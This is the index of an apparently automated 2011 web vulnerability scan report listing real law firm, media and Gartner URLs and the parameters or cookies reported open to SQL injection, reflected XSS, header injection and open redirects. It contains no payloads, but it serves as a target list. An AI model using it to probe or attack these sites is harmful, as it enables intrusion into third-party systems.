XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-04

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 12 19:54:51 CDT 2011.


Loading


1. SQL injection

1.1. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [dt cookie]

1.2. http://layserfreiwald.com/attorneys.html [AID parameter]

1.3. http://www.mccarter.com/new/biosnew.aspx [Initial parameter]

1.4. http://www.mccarter.com/new/homenew.aspx [show parameter]

1.5. http://www.mccarter.com/new/showbionew.aspx [show parameter]

1.6. http://www.mccarter.com/new/showcareerpagenew.aspx [show parameter]

1.7. http://www.mccarter.com/new/showeventnew.aspx [show parameter]

1.8. http://www.mccarter.com/new/showlocationnew.aspx [show parameter]

1.9. http://www.peckshaffer.com/bonds.php [name of an arbitrarily supplied request parameter]

1.10. http://www.peckshaffer.com/bonds.php [page parameter]

1.11. http://www.pillsburylaw.com/ [CFID cookie]

1.12. http://www.pillsburylaw.com/ [CFTOKEN cookie]

1.13. http://www.pillsburylaw.com/ [MEDIAUSERID cookie]

1.14. http://www.pillsburylaw.com/ [MEDIAUSERNAME cookie]

1.15. http://www.pillsburylaw.com/ [PCONNECTID cookie]

1.16. http://www.pillsburylaw.com/ [PCUSERNAME cookie]

1.17. http://www.pillsburylaw.com/ [__utma cookie]

1.18. http://www.pillsburylaw.com/ [__utmc cookie]

1.19. http://www.pillsburylaw.com/ [__utmz cookie]

1.20. http://www.pillsburylaw.com/ [hsfirstvisit cookie]

1.21. http://www.pillsburylaw.com/ [hubspotdt cookie]

1.22. http://www.pillsburylaw.com/ [hubspotutk cookie]

1.23. http://www.pillsburylaw.com/ [hubspotvd cookie]

1.24. http://www.pillsburylaw.com/ [hubspotvm cookie]

1.25. http://www.pillsburylaw.com/ [hubspotvw cookie]

1.26. http://www.pillsburylaw.com/404.htm [REST URL parameter 1]

1.27. http://www.pillsburylaw.com/a [CFID cookie]

1.28. http://www.pillsburylaw.com/a [CFTOKEN cookie]

1.29. http://www.pillsburylaw.com/a [MEDIAUSERID cookie]

1.30. http://www.pillsburylaw.com/a [MEDIAUSERNAME cookie]

1.31. http://www.pillsburylaw.com/a [PCONNECTID cookie]

1.32. http://www.pillsburylaw.com/a [PCUSERNAME cookie]

1.33. http://www.pillsburylaw.com/a [REST URL parameter 1]

1.34. http://www.pillsburylaw.com/a [__utma cookie]

1.35. http://www.pillsburylaw.com/a [__utmc cookie]

1.36. http://www.pillsburylaw.com/a [__utmz cookie]

1.37. http://www.pillsburylaw.com/a [hsfirstvisit cookie]

1.38. http://www.pillsburylaw.com/a [hubspotdt cookie]

1.39. http://www.pillsburylaw.com/a [hubspotutk cookie]

1.40. http://www.pillsburylaw.com/a [hubspotvd cookie]

1.41. http://www.pillsburylaw.com/a [hubspotvm cookie]

1.42. http://www.pillsburylaw.com/a [hubspotvw cookie]

1.43. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFID cookie]

1.44. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFTOKEN cookie]

1.45. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERID cookie]

1.46. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERNAME cookie]

1.47. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCONNECTID cookie]

1.48. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCUSERNAME cookie]

1.49. http://www.pillsburylaw.com/connect_forgotpassword.cfm [REST URL parameter 1]

1.50. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utma cookie]

1.51. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmb cookie]

1.52. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmc cookie]

1.53. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmz cookie]

1.54. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hsfirstvisit cookie]

1.55. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotdt cookie]

1.56. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotutk cookie]

1.57. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvd cookie]

1.58. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvm cookie]

1.59. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvw cookie]

1.60. http://www.pillsburylaw.com/index.cfm [CFID cookie]

1.61. http://www.pillsburylaw.com/index.cfm [CFTOKEN cookie]

1.62. http://www.pillsburylaw.com/index.cfm [MEDIAUSERID cookie]

1.63. http://www.pillsburylaw.com/index.cfm [MEDIAUSERNAME cookie]

1.64. http://www.pillsburylaw.com/index.cfm [PCONNECTID cookie]

1.65. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

1.66. http://www.pillsburylaw.com/index.cfm [REST URL parameter 1]

1.67. http://www.pillsburylaw.com/index.cfm [__utma cookie]

1.68. http://www.pillsburylaw.com/index.cfm [__utmb cookie]

1.69. http://www.pillsburylaw.com/index.cfm [__utmc cookie]

1.70. http://www.pillsburylaw.com/index.cfm [__utmz cookie]

1.71. http://www.pillsburylaw.com/index.cfm [hsfirstvisit cookie]

1.72. http://www.pillsburylaw.com/index.cfm [hubspotdt cookie]

1.73. http://www.pillsburylaw.com/index.cfm [hubspotutk cookie]

1.74. http://www.pillsburylaw.com/index.cfm [hubspotvd cookie]

1.75. http://www.pillsburylaw.com/index.cfm [hubspotvm cookie]

1.76. http://www.pillsburylaw.com/index.cfm [hubspotvw cookie]

1.77. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 1]

1.78. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 2]

1.79. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFID cookie]

1.80. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFTOKEN cookie]

1.81. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERID cookie]

1.82. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERNAME cookie]

1.83. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCONNECTID cookie]

1.84. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCUSERNAME cookie]

1.85. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 1]

1.86. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 2]

1.87. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 3]

1.88. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utma cookie]

1.89. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmb cookie]

1.90. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmc cookie]

1.91. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmz cookie]

1.92. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hsfirstvisit cookie]

1.93. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotdt cookie]

1.94. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotutk cookie]

1.95. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvd cookie]

1.96. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvm cookie]

1.97. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvw cookie]

1.98. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 1]

1.99. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 2]

1.100. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

1.101. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

1.102. http://www.pomerantzlaw.com/practice-areas.html [PracticeAreaID parameter]

1.103. http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html [User-Agent HTTP header]

1.104. http://www.superlawyers.com/redir [User-Agent HTTP header]

1.105. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm [NewsID parameter]

1.106. http://www.wiggin.com/showarea.aspx [Show parameter]

2. File path traversal

3. XPath injection

4. HTTP header injection

4.1. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5 [REST URL parameter 1]

4.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3 [REST URL parameter 1]

5. Cross-site scripting (reflected)

5.1. http://ds.addthis.com/red/psi/sites/www.dmoc.com/p.json [callback parameter]

5.2. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]

5.3. http://ds.addthis.com/red/psi/sites/www.letipli.com/p.json [callback parameter]

5.4. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]

5.5. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [callback parameter]

5.6. http://ds.addthis.com/red/psi/sites/www.wi-ala.org/p.json [callback parameter]

5.7. http://gigablast.com/ [c parameter]

5.8. http://labs.natpal.com/trac/js/ena.js [trkDomain parameter]

5.9. http://layserfreiwald.com/attorneys.html [mode parameter]

5.10. http://m.perkinscoie.com/publications/ [name of an arbitrarily supplied request parameter]

5.11. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [REST URL parameter 1]

5.12. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [name of an arbitrarily supplied request parameter]

5.13. http://www.gartner.com/0_admin/PasswordRequest.jsp [startPage parameter]

5.14. http://www.gigablast.com/ [c parameter]

5.15. http://www.gigablast.com/search [q parameter]

5.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

5.17. http://www.hartfordbusiness.com/fs_webkit/fs_css_processor.php [src parameter]

5.18. http://www.hartfordbusiness.com/news14300.html [REST URL parameter 1]

5.19. http://www.letipli.com/favicon.ico [REST URL parameter 1]

5.20. http://www.letipli.com/member_details.asp [REST URL parameter 1]

5.21. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 1]

5.22. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 2]

5.23. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 3]

5.24. http://www.mccarter.com/new/homenew.aspx [name of an arbitrarily supplied request parameter]

5.25. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

5.26. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

5.27. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

5.28. http://www.ngelaw.com/about/honors_awards.aspx [name of an arbitrarily supplied request parameter]

5.29. http://www.ngelaw.com/attorney/attorney.aspx [name of an arbitrarily supplied request parameter]

5.30. http://www.ngelaw.com/attorney/bio.aspx [name of an arbitrarily supplied request parameter]

5.31. http://www.ngelaw.com/attorney/results.aspx [letter parameter]

5.32. http://www.ngelaw.com/attorney/results.aspx [name of an arbitrarily supplied request parameter]

5.33. http://www.ngelaw.com/news/detail.aspx [name of an arbitrarily supplied request parameter]

5.34. http://www.ngelaw.com/news/event_detail.aspx [name of an arbitrarily supplied request parameter]

5.35. http://www.ngelaw.com/news/events.aspx [name of an arbitrarily supplied request parameter]

5.36. http://www.ngelaw.com/news/publications.aspx [name of an arbitrarily supplied request parameter]

5.37. http://www.ngelaw.com/practice/practice.aspx [name of an arbitrarily supplied request parameter]

5.38. http://www.nytimes.com/2007/02/09/business/09legal.html [REST URL parameter 5]

5.39. http://www.nytimes.com/2009/01/13/business/13bail.html [REST URL parameter 5]

5.40. http://www.nytimes.com/2009/06/19/business/19scrushy.html [REST URL parameter 5]

5.41. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html [name of an arbitrarily supplied request parameter]

5.42. http://www.ober.com/favicon.ico [REST URL parameter 1]

5.43. http://www.ober.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.44. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [REST URL parameter 1]

5.45. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [REST URL parameter 2]

5.46. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [name of an arbitrarily supplied request parameter]

5.47. http://www.ober.com/practices/32 [REST URL parameter 1]

5.48. http://www.ober.com/practices/32 [REST URL parameter 2]

5.49. http://www.ober.com/practices/32 [name of an arbitrarily supplied request parameter]

5.50. http://www.ober.com/practices/55 [REST URL parameter 1]

5.51. http://www.ober.com/practices/55 [REST URL parameter 2]

5.52. http://www.ober.com/practices/55 [name of an arbitrarily supplied request parameter]

5.53. http://www.ober.com/practices/index [REST URL parameter 1]

5.54. http://www.ober.com/practices/index [REST URL parameter 2]

5.55. http://www.ober.com/practices/index [name of an arbitrarily supplied request parameter]

5.56. http://www.ober.com/practices/intellectual-property [REST URL parameter 1]

5.57. http://www.ober.com/practices/intellectual-property [REST URL parameter 2]

5.58. http://www.ober.com/practices/intellectual-property [name of an arbitrarily supplied request parameter]

5.59. http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter]

5.60. http://www.pillsburylaw.com/connect_forgotpassword.cfm [p parameter]

5.61. http://www.pillsburylaw.com/index.cfm [name of an arbitrarily supplied request parameter]

5.62. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP [REST URL parameter 4]

5.63. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP [name of an arbitrarily supplied request parameter]

5.64. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver [REST URL parameter 4]

5.65. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver [name of an arbitrarily supplied request parameter]

5.66. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP [REST URL parameter 4]

5.67. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP [name of an arbitrarily supplied request parameter]

5.68. http://www.wiggin.com/about.aspx [REST URL parameter 1]

5.69. http://www.wiggin.com/about.aspx [name of an arbitrarily supplied request parameter]

5.70. http://www.wiggin.com/about.aspx [name of an arbitrarily supplied request parameter]

5.71. http://www.wiggin.com/alumni.aspx [REST URL parameter 1]

5.72. http://www.wiggin.com/alumni.aspx [name of an arbitrarily supplied request parameter]

5.73. http://www.wiggin.com/alumni.aspx [name of an arbitrarily supplied request parameter]

5.74. http://www.wiggin.com/alumniregistration.aspx [REST URL parameter 1]

5.75. http://www.wiggin.com/alumniregistration.aspx [name of an arbitrarily supplied request parameter]

5.76. http://www.wiggin.com/alumniregistration.aspx [name of an arbitrarily supplied request parameter]

5.77. http://www.wiggin.com/areas.aspx [REST URL parameter 1]

5.78. http://www.wiggin.com/areas.aspx [name of an arbitrarily supplied request parameter]

5.79. http://www.wiggin.com/areas.aspx [name of an arbitrarily supplied request parameter]

5.80. http://www.wiggin.com/bios.aspx [REST URL parameter 1]

5.81. http://www.wiggin.com/bios.aspx [name of an arbitrarily supplied request parameter]

5.82. http://www.wiggin.com/bios.aspx [name of an arbitrarily supplied request parameter]

5.83. http://www.wiggin.com/careers.aspx [REST URL parameter 1]

5.84. http://www.wiggin.com/careers.aspx [name of an arbitrarily supplied request parameter]

5.85. http://www.wiggin.com/careers.aspx [name of an arbitrarily supplied request parameter]

5.86. http://www.wiggin.com/index.aspx [REST URL parameter 1]

5.87. http://www.wiggin.com/index.aspx [name of an arbitrarily supplied request parameter]

5.88. http://www.wiggin.com/index.aspx [name of an arbitrarily supplied request parameter]

5.89. http://www.wiggin.com/resource/404.aspx [REST URL parameter 2]

5.90. http://www.wiggin.com/resource/cal.js [REST URL parameter 1]

5.91. http://www.wiggin.com/resource/cal.js [REST URL parameter 2]

5.92. http://www.wiggin.com/resource/cal.js [name of an arbitrarily supplied request parameter]

5.93. http://www.wiggin.com/resource/showoffice.aspx [REST URL parameter 2]

5.94. http://www.wiggin.com/showAdvisory.aspx [REST URL parameter 1]

5.95. http://www.wiggin.com/showSupremeCourtUpdate.aspx [REST URL parameter 1]

5.96. http://www.wiggin.com/showarea.aspx [REST URL parameter 1]

5.97. http://www.wiggin.com/showarea.aspx [name of an arbitrarily supplied request parameter]

5.98. http://www.wiggin.com/showarea.aspx [name of an arbitrarily supplied request parameter]

5.99. http://www.wiggin.com/showbio.aspx [REST URL parameter 1]

5.100. http://www.wiggin.com/showdepartment.aspx [REST URL parameter 1]

5.101. http://www.wiggin.com/showevent.aspx [REST URL parameter 1]

5.102. http://www.wiggin.com/shownews.aspx [REST URL parameter 1]

5.103. http://www.wiggin.com/showoffice.aspx [REST URL parameter 1]

5.104. http://www.wi-ala.org/clubportal/loginretrieval.cfm [Referer HTTP header]

5.105. http://pillsburylaw.app4.hubspot.com/salog.js.aspx [hsfirstvisit cookie]

5.106. http://pillsburylaw.app4.hubspot.com/salog.js.aspx [hubspotutk cookie]

5.107. http://seg.sharethis.com/getSegment.php [__stid cookie]

5.108. http://www.pillsburylaw.com/ [PCUSERNAME cookie]

5.109. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

6. Flash cross-domain policy

6.1. http://ad.doubleclick.net/crossdomain.xml

6.2. http://attorney.findlaw.com/crossdomain.xml

6.3. http://b.scorecardresearch.com/crossdomain.xml

6.4. http://capgroup.112.2o7.net/crossdomain.xml

6.5. http://cspix.media6degrees.com/crossdomain.xml

6.6. http://d1.openx.org/crossdomain.xml

6.7. http://ehg-findlaw.hitbox.com/crossdomain.xml

6.8. http://ox-d.gartner.com/crossdomain.xml

6.9. http://pixel.33across.com/crossdomain.xml

6.10. http://u.openx.net/crossdomain.xml

6.11. http://www.bloomberg.com/crossdomain.xml

6.12. http://www.nldhlaw.com/crossdomain.xml

6.13. http://feeds.bbci.co.uk/crossdomain.xml

6.14. http://googleads.g.doubleclick.net/crossdomain.xml

6.15. http://imagesrv.gartner.com/crossdomain.xml

6.16. https://my.gartner.com/crossdomain.xml

6.17. http://newsrss.bbc.co.uk/crossdomain.xml

6.18. http://timespeople.nytimes.com/crossdomain.xml

6.19. http://w.sharethis.com/crossdomain.xml

6.20. http://www.cnbc.com/crossdomain.xml

6.21. http://www.forbes.com/crossdomain.xml

6.22. http://www.ft.com/crossdomain.xml

6.23. http://www.gartner.com/crossdomain.xml

6.24. https://www.gartner.com/crossdomain.xml

6.25. http://www.law.com/crossdomain.xml

6.26. http://www.marketwatch.com/crossdomain.xml

6.27. http://www.npr.org/crossdomain.xml

6.28. http://www.nytimes.com/crossdomain.xml

6.29. http://www.stumbleupon.com/crossdomain.xml

6.30. http://www.usatoday.com/crossdomain.xml

6.31. http://www.washingtonpost.com/crossdomain.xml

6.32. http://centrifugesystems.app101.hubspot.com/crossdomain.xml

6.33. http://pillsburylaw.app4.hubspot.com/crossdomain.xml

6.34. http://www.boston.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://attorney.findlaw.com/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://capgroup.112.2o7.net/clientaccesspolicy.xml

7.5. http://pixel.33across.com/clientaccesspolicy.xml

7.6. http://www.usatoday.com/clientaccesspolicy.xml

7.7. http://www.cnbc.com/clientaccesspolicy.xml

7.8. http://www.microsoft.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

8.2. http://www.hartfordbusiness.com/news14300.html

8.3. http://www.hartfordbusiness.com/news14300.html

8.4. http://www.orangecountyala.org/clubportal/memlogin.cfm

8.5. http://www.pillsburylaw.com/

8.6. http://www.pillsburylaw.com/index.cfm

8.7. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

8.8. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

8.9. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

8.10. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

8.11. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

8.12. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

8.13. http://www.wi-ala.org/ClubPortal/wala/

8.14. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

8.15. http://www.wi-ala.org/clubportal/memLogin.cfm

8.16. http://www.wi-ala.org/clubportal/wala/Page.cfm

9. XML injection

9.1. http://gigablast.com/ [c parameter]

9.2. http://www.gigablast.com/ [c parameter]

10. SQL statement in request parameter

11. SSL cookie without secure flag set

11.1. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/clientDetectionOutputs.aspx

11.2. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/clientDetectionVariablesForPost.aspx

11.3. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx

11.4. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx

11.5. https://my.gartner.com/portal/server.pt

11.6. https://www.gartner.com/login/loginInitAction.do

11.7. https://sso.gartner.com/sp/startSSO.ping

12. Session token in URL

13. SSL certificate

13.1. https://sa-live.com/

13.2. https://citrix.howardrice.com/

13.3. https://client.poynerspruill.com/

13.4. https://mail.howardrice.com/

13.5. https://my.gartner.com/

13.6. https://sso.gartner.com/

13.7. https://www.gartner.com/

13.8. https://www.google.com/

13.9. https://www.pillsburylaw.com/

14. Password field submitted using GET method

15. ASP.NET ViewState without MAC enabled

15.1. http://www.howardrice.com/

15.2. http://www.howardrice.com/6862

15.3. http://www.howardrice.com/Alumni

15.4. http://www.howardrice.com/Events

16. Open redirection

16.1. http://gigablast.com/ [redir parameter]

16.2. https://sa-live.com/l [url parameter]

16.3. http://www.gigablast.com/ [redir parameter]

17. Cookie scoped to parent domain

17.1. http://www.gartner.com/include/webtrends.jsp

17.2. http://www.gartner.com/js/optionsArray.jsp

17.3. http://www.gartner.com/technology/home.jsp

17.4. http://www.gartner.com/technology/include/metricsHelper.jsp

17.5. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

17.6. http://attorney.findlaw.com/b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657

17.7. http://attorney.findlaw.com/b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943

17.8. http://b.scorecardresearch.com/b

17.9. http://c.statcounter.com/t.php

17.10. http://cf.addthis.com/red/p.json

17.11. http://cspix.media6degrees.com/orbserv/hbpix

17.12. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

17.13. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json

17.14. http://ehg-findlaw.hitbox.com/HG

17.15. http://ehg-findlaw.hitbox.com/HGct

17.16. http://id.google.com/verify/EAAAAC-ut1obpQ8XP13MxYguTAY.gif

17.17. http://id.google.com/verify/EAAAAM2aT2sSooWAii6U_OlsGlM.gif

17.18. http://id.google.com/verify/EAAAAMIzcwu2zbAQKxdU-MyvDzM.gif

17.19. http://labs.natpal.com/trk/pixel

17.20. http://maps.google.com/maps

17.21. http://meter-svc.nytimes.com/meter.js

17.22. http://pixel.33across.com/ps/

17.23. http://r.openx.net/set

17.24. http://u.openx.net/w/1.0/sc

17.25. http://vlog.leadforce1.com/bf/bf.php

17.26. http://www.bing.com/fd/fb/r

17.27. http://www.bing.com/fd/ls/GLinkPing.aspx

17.28. http://www.bing.com/search

17.29. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

17.30. http://www.google.com/finance

17.31. http://www.linkedin.com/companies/peck-shaffer-&-williams

17.32. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

17.33. http://www.nytimes.com/2007/02/09/business/09legal.html

17.34. http://www.nytimes.com/2009/01/13/business/13bail.html

17.35. http://www.nytimes.com/2009/06/19/business/19scrushy.html

17.36. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html

18. Cookie without HttpOnly flag set

18.1. http://baxterhall.com/

18.2. http://layserfreiwald.com/

18.3. http://mail.howardrice.com/

18.4. https://my.gartner.com/portal/server.pt

18.5. http://www.elfaonline.org/pub/news/indnews/news_report.cfm

18.6. http://www.emergingvision.com/our_brands.html

18.7. http://www.fundingpost.com/breakfast/reg1.asp

18.8. http://www.gartner.com/technology/home.jsp

18.9. http://www.gartner.com/technology/include/metricsHelper.jsp

18.10. http://www.glaala.org/clubportal/glaala/index.cfm

18.11. http://www.goclubexe.com/clubportal/

18.12. http://www.hartfordbusiness.com/news14300.html

18.13. http://www.jdtplaw.com/

18.14. http://www.jdtplaw.com/

18.15. http://www.jdtplaw.com/CM/Custom/ClientSuccesses.asp

18.16. http://www.jdtplaw.com/CM/NewsResources/JDTP-Listed-in-Martindale-Hubbells-Bar-Register-of-Preeminent-Lawyers.asp

18.17. http://www.jdtplaw.com/PracticeAreas/Real-Estate.asp

18.18. http://www.law.com/jsp/article.jsp

18.19. http://www.law.com/jsp/nj/PubArticleNJ.jsp

18.20. http://www.layserfreiwald.com/

18.21. http://www.letipli.com/_rknet_css.asp

18.22. http://www.letipli.com/member_details.asp

18.23. http://www.linkedin.com/companies/peck-shaffer-&-williams

18.24. http://www.mccarter.com/

18.25. http://www.mccarter.com/new/homenew.aspx

18.26. http://www.mccarter.com/new/showlocationnew.aspx

18.27. http://www.memberize.com/

18.28. http://www.milbank.com/en

18.29. http://www.ngelaw.com/

18.30. http://www.njbiz.com/article.asp

18.31. http://www.njsba.com/calendar_events/annualMeetingBlog/index.cfm

18.32. http://www.nldhlaw.com/

18.33. http://www.orangecountyala.org/clubportal/ocala/

18.34. http://www.pillsburylaw.com/

18.35. http://www.pillsburylaw.com/a

18.36. http://www.pillsburylaw.com/connect_forgotpassword.cfm

18.37. http://www.pillsburylaw.com/index.cfm

18.38. http://www.pillsburylaw.com/scripts/images/arrows-default.png

18.39. http://www.powelltrachtman.com/

18.40. http://www.powelltrachtman.com/CM/Custom/Case-Studies.asp

18.41. http://www.rothmanconsulting.com/

18.42. http://www.rtacpa.com/

18.43. http://www.semmes.com/attorney_search.asp

18.44. http://www.sleepertechnologies.com/

18.45. http://www.smithmazure.com/

18.46. http://www.superlawyers.com/redir

18.47. http://www.sutphinblvdbid.org/

18.48. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

18.49. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

18.50. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

18.51. http://www.wendel.com/

18.52. http://www.wi-ala.org/

18.53. http://www.wi-ala.org/ClubPortal/wala/

18.54. http://www.wi-ala.org/clubportal/

18.55. http://www.wiggin.com/

18.56. http://ads.keypromedia.com/www/delivery/ajs.php

18.57. http://ads.keypromedia.com/www/delivery/lg.php

18.58. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

18.59. http://attorney.findlaw.com/b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657

18.60. http://attorney.findlaw.com/b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943

18.61. http://b.scorecardresearch.com/b

18.62. http://c.statcounter.com/t.php

18.63. http://capgroup.112.2o7.net/b/ss/capgroupprod/1/H.15.1/s41646418426182

18.64. http://centrifugesystems.app101.hubspot.com/salog.js.aspx

18.65. http://cf.addthis.com/red/p.json

18.66. http://cspix.media6degrees.com/orbserv/hbpix

18.67. http://d1.openx.org/spc.php

18.68. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

18.69. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json

18.70. http://ehg-findlaw.hitbox.com/HG

18.71. http://ehg-findlaw.hitbox.com/HG

18.72. http://ehg-findlaw.hitbox.com/HG

18.73. http://ehg-findlaw.hitbox.com/HGct

18.74. http://ehg-findlaw.hitbox.com/HGct

18.75. http://ehg-findlaw.hitbox.com/HGct

18.76. http://labs.natpal.com/trk/pixel

18.77. http://m.perkinscoie.com/

18.78. http://m.perkinscoie.com/practices/

18.79. http://m.perkinscoie.com/publications/

18.80. http://maps.google.com/maps

18.81. http://meter-svc.nytimes.com/meter.js

18.82. http://ox-d.gartner.com/w/1.0/ajs

18.83. http://pillsburylaw.app4.hubspot.com/salog.js.aspx

18.84. http://pixel.33across.com/ps/

18.85. http://r.openx.net/set

18.86. https://sso.gartner.com/sp/startSSO.ping

18.87. http://u.openx.net/w/1.0/sc

18.88. http://vlog.leadforce1.com/bf/bf.php

18.89. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

18.90. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

18.91. http://www.bing.com/fd/fb/r

18.92. http://www.bing.com/fd/ls/GLinkPing.aspx

18.93. http://www.bing.com/search

18.94. http://www.capgroup.com/

18.95. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

18.96. http://www.gartner.com/0_admin/TechnicalSupportPhone.jsp

18.97. http://www.gartner.com/5_about/company_information/images/privacy_disclosure_head2.gif

18.98. http://www.gartner.com/5_about/news/css/content.css

18.99. http://www.gartner.com/7_search/js/Options.js

18.100. http://www.gartner.com/css/menu.css

18.101. http://www.gartner.com/css/win/homepage.css

